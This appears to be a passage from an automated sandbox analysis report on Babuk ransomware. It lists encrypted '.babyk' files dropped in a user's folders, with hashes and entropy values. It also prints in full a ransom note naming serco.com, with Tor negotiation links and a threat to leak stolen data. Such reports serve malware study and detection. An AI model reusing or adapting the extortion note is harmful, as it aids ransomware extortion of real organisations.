                                                                            Preview: B|. .....O..4...-...@?...z'.4M..........`$.Z.gZ..\]s6.]..6.<......_?9m.\.U.._.0.....c...wP..T...\.7.....a............V...{].G....Vp..y...#j...;...v.$<GW....@..~.".....9...O7....../`C.......Ri@...8.?;EB.....p....KE..b......1y.V}L1`...5PnsZ .x.e...@..,..n..N7..E..A.t......].A..M:.3.0..?0T(.....(q.w..ME.,o2].uh....4o.qZ>j.b...O..Y......7..~.......!..".'....cE#)....m.4a.....u...A@..9..:.q.].M.{...f..ZB...y...a.s..%.(;.....py.:xL....x.."...WvP|.L.as...AT..G.F.`.r...T..../j.>c...S@8_..e...:W.e.E...XM..3....j...q)d.k...O.`_~.....S.u..s.L.[..H....6#I.}h&I...fl._.g.ASG..I&..2.2.<.|......U.%./E\.G0...........>......>...b.w5p..j.gO{i...&..c..2.-...E......].z..*Q$......L.l9.1.Y.....F8........)#.C..t.R.2.d......vO...9.. 4&-.X\...D!.T..;.~..#....\a.........-....<S..X..m.........K.y*2.Q..op.....%.*..3\..]...Dk.x".Z.Ph.x....y1...f....y|......$>.....[...r.^o..TL...Db..../.x...._......U.$I.Pud.y.......O..7Q..y...8... .#..8.TL.......,......>.q...B..k.....K.
                                                                            C:\Users\user\Documents\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828877098489281
                                                                            Encrypted:false
                                                                            SSDEEP:24:UL5VZnKDZowFIMrydXV6gVE8T6nNyYBDRqmX6BSE8u0GT+2dSc:UjZnKDTIMmp9/ctqmXwS2P60Sc
                                                                            MD5:0F0D245B56742BA666D6210F2A8ADD36
                                                                            SHA1:408234C29A910F3DD5B5EDE3B36ED7A2FCD031E3
                                                                            SHA-256:C44C6A45A853A66FCB76397A05E8DA199EAB98558033476D5B54E20F17C4148B
                                                                            SHA-512:72E6B461C6D08ECE973765A9D32F4BADB2B8F1AAE87787A622347FEBE76D3DF2CEC59D273597453D3692DDF080F85AC8A1D6328F4979D3F2CD9BEE4498D0AF5E
                                                                            Malicious:false
                                                                            Preview: .K....K.ny.ezjk....e.7..I....i^.g.N..G..F.....$.h.)<..1..D.?.+ Z.x<.6D.6..E)..z"...p.......$F2K.v0..d.../.......C...........a9..(T.s......6.p.....a.c.9.Ho8..EZ.g..TP.../.Z..s:.{R.. .*..6.D6w)9...BT....t..;.ubg4:; 1/..+@....o^..3j....cR....Y...U...`....g..X.Uf.#.E.\...~7E..c!oX.."|...!".3.B..s......a.*....*`H.n...i.............-....P8r.Q...4.......ZO$.e...-f..h.b,0{c ....GB........ni.X.z....;T.......3."..i..Uq..J..."B......1M.t#.?a./e.z`....+-..v.8.x7...A...9l....@..x.Ml0A=.t#).9.Iw..q.v;..$.MEJ.m...Q......9...E......d~1i[.i.!..jPJ..l,e!t.......7..\......`...:6?2Y .cZZ...ik.L..e....&..h.'T....1...P...r'./?._.9-........&.vu.#.\.I....>@.H....I.|.j.=...As`g..G...jZ{7..w...0..e...&~J.G.Kg..Kp..@....H......+...o.9H..4p@..!...h........b$..Q..z.&..&......E..^.u...-...6....Z]...J...?.C.Y.~V.%.z`./.,.r_.......`/E..|.&B3.g@.>.8.l......V...... .Y..f....is..Q.y..5.5.|Y.>I[.e[.2.l.0...75..........\)....I..H.u........RF...r.g...Q#...'...k..U..&Hr......~..k
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\BPMLNOBVSB.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.850517234298039
                                                                            Encrypted:false
                                                                            SSDEEP:24:W4a8N9ZxWKpBQJg05zJUVcpLNgpIIn9oSkNQKX+aY1FHxkkeyCN:W0NtmZ5RN/+9raY32N
                                                                            MD5:F3BEB4465CF1780F4F6C8171C0B651F7
                                                                            SHA1:D3B0BE2E0AB31D79468200A6F67AB50580176413
                                                                            SHA-256:CD2D548268784BA7CEDBB779273D53B4ED4325FF5B1E49C51A72D9DD6372C4C2
                                                                            SHA-512:4A02A1B51F8BF1258EF4E0BB8A43EB443236B4DA96292F3651380CA1B6E42FD4F290D06D3F3166AEA12CB5ECDB0AF76FD796355C1F191F0558F4E60A9F99D1C9
                                                                            Malicious:false
                                                                            Preview: .s..d+..P......P..t@d.Nn..n..s.........2...lQF.c.D.....^w.....ZI......@.Y.,...#gS.._....X.e.U..W.%......S..*W...{....DL.j$.=..p...=....Q.o......Z=#Z..l.!..S.3d}:.8..I...~.w(q.].....h.....+".$.F5..y..g..QQ.=....."......$..q....t.`..}.Z8./L...l....+...|$..&._"..g...k.Z..c.K.D...Z.!..... i.Y.a[....X..{/....WS..j.h.rA.t.E p.....^....R......t..m.9[......n..._....f....V=..e..~M.x :.T(!^..q......:^..g.I<...d.I....f.y.k....=..p..c..>.^..)S...C/.n..j`.Z..C.D.....%.6....!.,...7.p]......X...S.W..`...h#.:._4U1{...]..).rG...d%..6..dz....d.J....q.p...{.r.r:_..g,8..x..I...fbb.)#D.)....K...;.d=|7o........POlq..I.......>.1...._.....B..q..p.^.P..c.....i...U....?...Q..?..R0n`..?..8..)..]h.;.s...T3..~<.9....y2...-...6......5..1..V\*v..?.$B\.~..a....w.......A...T4...O..~.Y...4..n..{K.z.4..H.-..U.*.6g.....xn.t1v.o..^p3..m.=S...;c...=..cd.b...A.....W7:#J&.x...I../g@T...#..)$....c.$.....[.VLG..h.U"".=...Z.R[.gI...IT.....?....I...|.*.NX...3.+.C.P....V..j...3.0,..L.
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\FENIVHOIKN.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.814645400867575
                                                                            Encrypted:false
                                                                            SSDEEP:24:Jbf2QmF5lkhVWIlyqZfdHFbkTk/5slVXeNph9HTsT0MrV71CjprcnZCTUbTpSZ:JfVw5uWoyelbN8kdHy71Ciqwps
                                                                            MD5:303171875BD2FADC435242EED9025B09
                                                                            SHA1:EB3E164B1DF7433AC64AAC4B926845ECA070B65B
                                                                            SHA-256:01AEC6E77C287992AB9EF6AB606409652C44D01D622A01F5CF95E9EE40BD7161
                                                                            SHA-512:5AAD16C28E2086EA992BC1493FC154AE324224009EC02DDD124F168520E5AE08E323A6DC6E1DF03EC56D2302D9DB3B34831CFD89DDE2E196DF9CDE93B42439E7
                                                                            Malicious:false
                                                                            Preview: ..{...%.'.S.F.o{...;.N...95..`...N._...x.c.r.[..]...]...L.y....[{.....T...'X.@y.*j......"a..$$.8y..~`(#kDo..cF.qad.....P.<.....K......Q$..;\...w...^n6... ...-`.......i..P.m.B..~).q>.L..]B.y..."-...Z2.......!...t.......\.GVv..E}....Z...0.)%.@....1`.W.q....jn.=..,..<..f.D.LB{PS.....+..!....r.lH..........o?.DB.i.P.......<Ru..nn...Q....y..\U|x].....0_...).+..pu1...bi...N.6.........s...I%..`=.E...N.....5+..S}.5b..{o.3A....(...A.!#..F .U..I-O&.EI..R.Ls..w.`.e.K.y..:.((i.h."..BO.V.:..A..z..xQ..x(B.Z.^..c).n.+.u!.u.`h).!..;.m.5....VmS(Z=8...#.9...H..Y....u..9t.bL..U.......MS..y)...^...e..R.h$l0R.....T$g.....a.....v1A8..q}...7....e....!.rR..h.$P.5..5.+}.....F.tf0..C(o...7..,.TRL.....Lnd..~.dSu..r..f...N..i2dL.h.wZ..A...L......#M...i.#..J.!..1.....h.....#.[.$;#VYUc..Z.4!O.-.r.....=`..z.;.@4.......b.h.0!.m..$n..n).........xs?....z...q`}...l1...P2.n!~ .x..t^......u...r*...s.\.l`L.i...].6........#|#.{W.... ...F.EKnFo..]..g.....1\H..k..g.?.L..jw...8..
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.807957217149887
                                                                            Encrypted:false
                                                                            SSDEEP:24:lV4UtIDG8qcunqDDBeEnLH5HIRgfs+fZ0MjQK2GCVlyVHyODv7zSjnzkcEXb:EUyXqcQ+lHIssK0MT2JHu3fSjQc0b
                                                                            MD5:7FF7144D9BEC3D1DCF30B9B737811763
                                                                            SHA1:49DA3992F9C02EB8F936AAC55C6B07FC8250BFA8
                                                                            SHA-256:4D27C69DC5AC21FE9FDF0CFD89ED9EAA424943B7145A672389DCAC89F8A52F19
                                                                            SHA-512:143C1D6698E8D70ADEF7860F954A3A9AB56C5FDE306026F67229505DFDFAC87C6D0CF0BB4A7F7E719674987D63489B1E1320EAFDCA8F40786AA265493B87FFDD
                                                                            Malicious:false
                                                                            Preview: .h[.S2.t..#...j6}|.P..{.....p1 0<....+...T...[.EH..u>\..).?^}...9....;y.z./NB.`.l..).N|b-.C.@%....b.$...0....,Yp....2p..:.. .r...-;..j..!]_.Q.....q.;+S.+l.g..*.#.-...E......</k..`f>.pH[..A4O. ...w.\..3|...3v.c.g%......j....Z.].>...^.|.7...IX...9.......;Vs.....`G>.,.$.ZQ...uY.tH...$T..Y.s...Mv..H..q...h.`.._....w..;eTf..J..h2M..41.>(X.\..y..X...S..X:6..n...l7.q.S......HN.4Y..)".n....=.jJC....r2..1.8r..._g..h...q. ......>6...Y.K.Z..V>....YO....g.y:...U.+...M.j..R_.;...>Lg..........B.1.6..g,..8...2..v.@&p.F+..Ub(".Vf...3.6....}..."..|..{.xZD......~.N.O..C....Q.).Zu......e..P....:....Q.........=Q., .....dI..X...35.......7.WW.p.+kH..+6..u.Z..[/..`...a@J.+vRO.....e...G../gIQ7...$..@)u.45.t.."c9.j>g...k5~...v@X.q9.K!L...".>...3...vV..d.h.B....M..vI........l<...x#8..Y...X....Dx..R.K.d.^V).q....P"..{... ........W...C...Y..^.u.d8.1...a.>9/..v..).l..2'_...F.x3l.[..>...@.G....nX+*.....%.a2Iu:....$..I.......g.,...8A..*..^'K...2..C5 ..V..Q...&.3.v.T.....
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.821670545474546
                                                                            Encrypted:false
                                                                            SSDEEP:24:AQT7VPnwhZugD3ZZrj2ICwPwe9Z6yFFpsZmVz30KH2ic:AM9n4zLrj2ILPwuZPFFpuAoL
                                                                            MD5:94B3974BBE9C9158D44F3E5B4D7D7FBD
                                                                            SHA1:8959D7AABD0F922C25369CF90078D94E7B33F819
                                                                            SHA-256:64ACA7C5B89BC774AD630CAEAF8AE150CC85C854E2464170134B7559783A18C0
                                                                            SHA-512:A8EEF9EF4C302BA9064959E7489FDA17D8DC84B2F885F5943158B447C32CF79EF8BAC1A3D2C6093A2A29CDCF038054746654A086AB283222E6D5FA732E035EE1
                                                                            Malicious:false
                                                                            Preview: .K+..?.....H...n.JDP..c/.!......"....dR...:.d..Eb....<..F.?.._..Vc.Z.........z.../.....m...P.^.....r/....'.....@.....\)C.5z......R(...~..O..L.-.*..v.v.....-J(..Ob.U..N.....IN.3E...5......}.q..h..]b=........^.lK{..#.(L.PM.[.lb....Zr5.'.0"eT...l...A........H.D.... .4>p.;a..nW.T..x.Qo..p...f....}..K.3.WO.#\X..N..frm:...eXB7b! ..w.g..o{..L.1PD..3g|...N*...XoIJ..X.2...,..d.>..*pQ.86/..0.8..D`.b.W:3.e.........wj=..^....8.o.(..2wr?/..o......jrXrc......];.....H..Y.Y<OT...8b..l}KN.y.L.."a.r9..|.pT....v....o.......L{.?...q.4r.. F..ZZ..C...e......Fu...6....H&s.R.'......D"...~0`%...._..k....?Z..3.Q.I......8..0....`....&....]QJh8..z.p....Y.`...kt...^....u...=`..1..h.........VC.<..1..i2.F..Q..{]:#..X..h.2.ha\._.>/.......s..em.2..E.W.D.Gy...#..8.Ueu.~...S...#W^..C.]t5..+......!...).X.r....xr..npxE...*.c.G..>...:....5..........y.sJ...........SD..L..Ok..........Wy..W..*:..\....j....e.B{G.f.^.t....Y.s|.i`..#.FV$$.......x.^.l.r.=Rt......6..%;....q.C.x..\..y...m
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\WKXEWIOTXI.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8292002793350095
                                                                            Encrypted:false
                                                                            SSDEEP:24:QTI8h2fTbRxhFK2ofSaF5qUlbCkfG7EQF3XXFrcAS33wYhM4zCiOuekKkD:Qj8brqSo5lbCmMs/CG7
                                                                            MD5:BBB04907B948478EAAEFAD6FD5C66164
                                                                            SHA1:EBC1C087AE0F977E67F72BDF10B7708753A79F95
                                                                            SHA-256:3B21DBE49D4FEFAC79B1ED1E1F1FB8766D4659A92359176A6E2DA70846097D7E
                                                                            SHA-512:9BFAADC87586587747F6DF7A9D4F3D73689F6F0BC8C1F4538BE30CF88800D9EE37297DEB89E5DED02E3BDFAE1600CDD9EC64D73975B021BF32D3F42B885A3E86
                                                                            Malicious:false
                                                                            Preview: .g...l.%.e........[g...M....<...wwz.....S........Qh..g\..c..M.!..P..{..hd....s.....T-.A=.,.?J=..6..b.7.T......n.e...j.B.D..1H.K.....d<.o....uL.Vy.k...s.....{......."i`.!......T...F...9(qL../....k.~..?.O..(.u8M.2..m.....j.8>..uTY.......kI.?4d....Z4..7...).m.)...e<.[..rIAp..{..B8.(...re7.P&v..-uY..Qf...#Y.{.....o#..w...u.....n>.5..."..#..G..i..a.T..R.I#n....-a......6!!.A..K...JM..M^..\.,.O...B..~..(...8.)k........td..Q...`..h.|.h`\5.W.~a6...NF.....Zb...SOl...e....,+.bW.6........,........q....C*AM..M...........D..g.....n......cX..9...|....8D..~....v.)^..._.]...L..%.5...E.Ji......qA.c.\"....l....tv...@Q...m.....se....O..Mv..-..OD..P...pp.c]l..P..H.V..Z...I1uQKv..#*.d_<YX......C...q.t..........2.~.x._..Xr....F..2..b..);....k. ...'.f.D..oZ.....~.T...0+............r.BH4...TNX...._.`....8.7....w...V..~...9.#P....."7a....2..pv[..}y.j.jo.....o5.......l.r.0.....-. ..~...G......O.p.#...)..Z..?P8...7.......D..9.Q...]p...o3.<}....n..7..7.]+....t.
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\ZBEDCJPBEY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836858496756232
                                                                            Encrypted:false
                                                                            SSDEEP:24:2yrbv/O5iyo/gzd9u4LJJeJ7hfsK6WJ/DJRyvnlM0to3h1mkK66gZ:fbO5fo4ju4LJJk7hh5FDnclsUO
                                                                            MD5:E48D0C66935E90D780C77AC75B574D9D
                                                                            SHA1:CB5E566F20975FCE2D323726A7C6D139114E8FE2
                                                                            SHA-256:99A4032B3E4744CD2342DF2AEB7C0FFE2A1081D845197256E13341DC7A9D4F8A
                                                                            SHA-512:3D4A142F4BA45893C81F0E0D6952A2AC5F8E8B895593833D88D66F935105BFC02C639D38747D276293F5406A0679FCC80DB35236956F20FB10A873C781880882
                                                                            Malicious:false
                                                                            Preview: ..u{-.{KW7*......}.1....=....1(=....?.O....p..L.....6.....,.a...f............0L.....J..L...p|..+...1!..w..s......;.%.....M..T........u...O....."g...yv...?.7....h...5Q.... d...p.~V.%?M..r...L..yI.............F...r...!..1...t...J..:.\)..I...x..y.r.....v......A.rP..A.WzBrP9.b.....@5.,....................+....k....v...\.9.B.g.c%.J%.:9.....E)..g.w~n@.u.q....g.a.b.K.Gj.i..{.p......[....'..E......Vp{...#.o(.. .y...H..........[>.....F..z.z.../u...7..w:b]...[n5#../.R&..b)N.f{r..B`5Ka..l.2=...7...v...x.......^....n._r6..6]d.j'.1|xh...p.....rL2Pj.C....+../..C.$.....:.'....p..P....V.v.;...v..}pk......+.........v.1e5pF..a..|,V..B..A..;...uNGzZ</t|;?.X.-.}.C..~_..v]H[...8..3.93i.M...k=~g.'c...S.J%H.......>.n...:xC.9...s..)..B.$iy..)S..4pAd.jf._0.....s_...;..,...je.&@&.Y.Fn...9...R.:;.Yi.....ML,+W.=.N....{...%...h..Hy-...{B.(.....s......&6fogX....!...9.....5k.+.U...nA...S....z....ct.....3V..j.e..@:...I...X.A.......p..B.K...1u....."...
                                                                            C:\Users\user\Documents\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.862174794704382
                                                                            Encrypted:false
                                                                            SSDEEP:24:hr2sxHO28Ty/u+FgU6y8CsWoentVXlX6mpoAgnBVc2HbtQxRo9QHTURKWJhsXxqW:hDHO28m1FgawytfX6mpgBVbxSqxR5kIW
                                                                            MD5:3893F9DF2FE170ACAE30F5AC382BC4C6
                                                                            SHA1:A19121774C7EB94010CF7780F0F7B6C25B4482E3
                                                                            SHA-256:44BE7B41DB0B8128407425EB6703D28D93E95B0261D688BF08C0F7498BDD287B
                                                                            SHA-512:E8B59D0D942095E7D2A06598AD282AE3E5CA4DED4486FF37BF8B3B8365C738A44D1132DCF806DB818CC9B3B3996450117FB6C9587E6D3C4AEE562A65978DA9B4
                                                                            Malicious:false
                                                                            Preview: h+...)?j.Bh.....e.....7..t.L.......c|.,=@..F..SB.>.2..N..M|........b..R...`B.,cE.G.a..\.S.d}.Y. ......R.<......v.~....[C..0.]...E.)/e.+....~d..[2...'..z..C..N...5......5:.g...]......&f:...A@.1.;6Q..`....H~.6.I*......+/W._......"w.)9.=,...5.5..u.Z..v.,^.~....[>..q.fa...Y.'.+..8..6y..Z....M%.l.i.H.r.Ek.~Z..{...h.1U...}....0.4P1......r0......2.Er.{..C.x...`.d.)b...&.!Q..g..i..?R..@ng..#.n..u.0.)3I.m\.>...Mn...d.&0g .[.Z.RN..R_.^......_.C...e.d>."5..........aN.e.o.....r..,.%.l..."..I,..E.=E.......w./.PUG.4.`..>..8'<..3.mU.../oj........f..hs2.[....6...7...;....~.p.."....x.....p7....E...K...yY..[...dJ(..%...ieV.i{.qZ.o.>.yjj'.Nr...J...<0....8}.O...Xe.......T02.x."3 q.l...MO.......R`...E$LM........Zf...........@.`..R.. ........5..=...8R.(Z..6.z/=.y.tv...l.7.q._N......9.....x.L@.b(.C...}#.-1]a.'&4{.M...o............!5.sp.....m..p.K(.*.E.5.Om......3.....zl.........\J..!..m].z..++.../...=-s..x&..`......S.mB,py.g(/-9....9..B..S...M.-p"8.A.
                                                                            C:\Users\user\Documents\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828917124960974
                                                                            Encrypted:false
                                                                            SSDEEP:24:SW66haqZ5+sfJ8MBR01NcItv8Oq8jjHjpJwOo07Uoz9bQHv4+RuGD:SW66DZ5+kRWk+jzwOtpX67
                                                                            MD5:B361C40F7B0E7F13B95F36BBD11F8AC2
                                                                            SHA1:7A7978854F015935FD31ED274E3DA015DA5E0FC8
                                                                            SHA-256:87C1901EA9A22713B18738FFB9BFAADAB9AA781D312E7422273BFD09E2A4B84E
                                                                            SHA-512:255460C6B63C3BE7160DE98D4CBCA6B9D57C5CE19335CB8A0CCE6E3DE7589634C6A09B8EB02B0CA405A23AB053D57F6A51DC1ABE839720D68463D5D2021AB622
                                                                            Malicious:false
                                                                            Preview: .[Z.wi8......]..'...Ve.2...........E.A.l.. .7'..?i'.k..%... ^e...8.....#......=.|...........!VQf.9t....+..j6J..T.%....e........+..*_...m4...:.Y$uPO.....Q..GoTq....p.QZ.._Z...p.).].T...;..3.......".g.h%!.H...D._t..^.......\0...?;.{!-a\gW}...a:..H..$N.=..3*...9YGG.....!.,..._..+.F....M.... .i.....s...V.9...^..F3<...}.o':..}.].]..L%.Y.A..^.....w.5...(h.a..E.......L.Qq...>.P'zG.....h.|.-.@[...&..+K...O..l....F...g.*... .nWuS.....I.O.1C#.'B..$.....t..W..H........P}S}X...Y.f..(./'HR..HC`-a.Vb`...h..}....._...J..u..."8..V{.)Yw......X...~t...D...Z.<.t]g..6.)s..."....P,.O.h.K.7Do.Z`7..T..c6..7.-..n...../....SB.Y3S\...%f..........lq=.4J....7..9.+..a....{.._..'..t.q.B.NC.DB.WTg.gy....]n.j7..._J"..Y..:#.V.s.+TY.p...$b...V..Z.....n....1C#..E..&.N.IY./..iu."zG)S.-b1%#....]..g..;..fd(~.<...!ncz5....<v....C..>..8./............=_.*s[.z.=,h..}...o|o...O.%...@...O..iz...N.........\..\H.....0&.n...V.O.W.7..9.......cB.".....%..\..p.....T.5=.'.h..mt
                                                                            C:\Users\user\Downloads\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8511483934527275
                                                                            Encrypted:false
                                                                            SSDEEP:24:sf9X845Wi1/isWlbi2ncJwJ2HNr8KkeZgzK4xHFLZF9yDFP:+5r16rg2nTJ2tr6tZ3k1
                                                                            MD5:76A350FE015A1118CF8481DC6A3D6AD4
                                                                            SHA1:55968B4789993608BA353B34828A47A5DB06BA2C
                                                                            SHA-256:A8B5A7F47D766E4124D444BB4D495ACEE6B7816623D12887F17E1386278F812D
                                                                            SHA-512:142EE2BFDE84250C1A0C4E9C19B7FAF2215DAF4AD6E4A5E709D9FC003863B5905D5951CE2E2CE96E6ED7576C7B6153EBDFFC89AD2D0B0BBDC4F8685FADF1D4F5
                                                                            Malicious:false
                                                                            Preview: .p~i4....3....e>Lb.Z.Cyo..=...#.Y.G+......&..;[3.O.?....?,Za%...."_....1yP..2U_...z.E..~.5..........>....MHX.H..N...n.....\.iw^..............p.........-.)..Y.7...8......Zn..6..:..@....'....._x...e...... ..ME.....J4 Q..(.l!.`{....9..'.........`..&..........(>B.#..P.Ym!>.uU.S..bC?....^..5.}1.......y.I...z9U...PZ...w.d.A.g..h.......`....(.XUb4...u..U.1.O.:7..'@....)j.0I%.6.Xx...F.Y.v.C....=4............D.5.!..H.A...C.d.o...J..S....`...."..xm.3"Qa........xK....fh[.T.. ..Knl.D$5.*......k...e.....mt..4....F..u>p...h.].F~*X<...p..dr.s....t..U.I].Lh.....GZ[n..g.z..R;.n.p.H..g.N....G?....}<..{...}V..@.O....@.9&..E..J...b...7N.z.....\.D..{.........Z..AT.."..%...].....v.q.. 1.p....f...^.v.....(O.:f.9.+.(..*. ..G......../..b.P<.z..... ..m.F.j.3.....4M...i.Q..$p.@(M.....;..ySv...^.4..as...........4G.........JC.........^........i.!.G+.mwl-.Q.yn`.....F...o.K......j...`....8..r.....8..ze.{......$..B.oR..q..{.h.S.~...pV..#.e...oo.l....L.....H...
                                                                            C:\Users\user\Downloads\BPMLNOBVSB.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.845921202341683
                                                                            Encrypted:false
                                                                            SSDEEP:24:KFk+E3MPHhX3xmL/u2ylT6SMByczgF228JdA3O4ZayeHGR984WaIoFtWZI4MiYs:KF08vmiFlCBycFzk3FreHGEBaIovaIds
                                                                            MD5:15A7E0B26EDD48822C3689452C34C093
                                                                            SHA1:78F4119BC0CEC50665D213F3C9BBF29EC5A172E8
                                                                            SHA-256:D5657CD5692FE3E6828502D87CF50462C82DF73246E3CD1F3826B1F6693697BD
                                                                            SHA-512:C6A621F73FF9780967C851DBFB794609645207F80043298DB4758138ACA893FE1B9D742A08F51AD18F206F16CDECBDD60BD706F1EE41AAA510FA1C98392209B2
                                                                            Malicious:false
                                                                            Preview: ....l..h.".j..EO.A....@.o.*.....:..........$L......&..0.X.)./.....T..q.DB.B^.8x.-..B?\ux.%$~.Z.Rx.]..'.5R..H.Gm}...;$gB:1..d.. .9.$...`.i...W..$5......bz...:...=.X....w.?...7..#.sI.k..Ac......j..H..F.-j.......cc.......\...78.R.`c..?..{..b3x..h..9t.=...H..*.....!g..3R..S`...F.1.q..i...R.:.K.Z.......r..... +...*j.;_.!..-f..9.G!x.3+.^8Isz....3..w"O.p...K~.H@`.......8Nj..3A.[..|;.U.~.cS.O.W..C..K....+.d.o...(......85)H..vK.h..`.....ZL.{..=..!..S.....:....?z..x....Y..,.....k;..C.=Y..N.K..../....ydX..*:..k.6....U.<[....Y^M.~..G..,..........m..:.."DS.q...../....0W.N9~Yu@7.6j.....y........A...G.B[..d..*#...b......)..G..u.~nu.....s..R...C.......<.h..K.W.v.....6...`1..g,.|.AZp.t.$H..m...z.8[tX.A$../T..e.Wy"....{.e..(@....'.......m.....U.........b..]./..d@}]..V......../+..9..H...B....=[...g~T..7..+..,.._..x>O..J2..Q.(...}_ u..P.(..Oe~r..=.........Ea..S..5..w..X......wL.`...`.@?a~4....7....O3.)3..&Y...b...39.L/..y7......N.w.wu.S.n..pD
                                                                            C:\Users\user\Downloads\FENIVHOIKN.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.809139453045874
                                                                            Encrypted:false
                                                                            SSDEEP:24:fAKS1VU/YQotFQCNey6gfJmWdnJ43yPOXLBpAYiHdoMtYGcikC:fAKKVUQQMpxRmsJ43yPO1pAYk+Gf
                                                                            MD5:E804E717064D5AF015AC11D69F398CDA
                                                                            SHA1:AC9EF7C96999B9D1359E3A406CD960A5100EE662
                                                                            SHA-256:F87AB180F19AA85FC5DF9019AD61D030E553A4CEB71F09C4B12D8F64C310A9A1
                                                                            SHA-512:FF3EC6BBCB919375F041A07E1004CA192DB202926A02650A083ED4FC7B7F38C7D83DADE4890DD096C899A7F567A40CF514540D80100EBA47702E07AD60B605C3
                                                                            Malicious:false
                                                                            Preview: ...Ci...3Y.%M...o...u..'..^]G:...{..(.T......K../.....;./.z...)..*8z......%.W...~.#...E.\N.E...e..B..V.-.a..}....n.!..V$.R..<....1...GA..{.B.G..-z.)..J.'%..P....N.OA.....|.(....U.<L.......R.C2..2.........~r$.W..E{..}jVe<..NmzRp.;...ah..b.a.u..u.n=3..0..."p.lI.Z...TF.g.f.9.._G.j.&m...?..%x..K.?.R...t,..D.s|.|Mr9......H..}.Kj..O..lP.;[i.....+.E.<.7p.'......./.eO|)n 09.a...$s...[......=.. r...Mi5.;||;.'}....p#..\.p.........X...q.?@&'..\..Cx..5..c.)Am....<..],...bi..+..{.k#.....".....Z9I.\S..y~2.6..2.:........m!...R...$..RM.5b!.&4.5<@buG.,h...H.B.......}....B.,.9H<j....p..z .L....,4e..,..L..`(...c.y......,.M$:...S..q.1nU.....5../.D.<....-a...R.....B.>.."...`.x7...5...a:eU..~.!.\f..ds#7.~......6...~.@\M3........,.&....t...Ic....f_S.. ..z.g.4.a3..b......+....{-..PTP.....i...Mm..M`...HQ...n`...>L....-.n.;.%.....e)..n...k5.. .#..cr..A..L..J.(....i.\.'.^....i.1M.{T....S.....`......z..zm..?..M...xR6.q#.~x3..jM9.9.@.u.-M...4X.&.hgV.D..;o`..?Ne..|.l.i B.)..
                                                                            C:\Users\user\Downloads\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.838375095976821
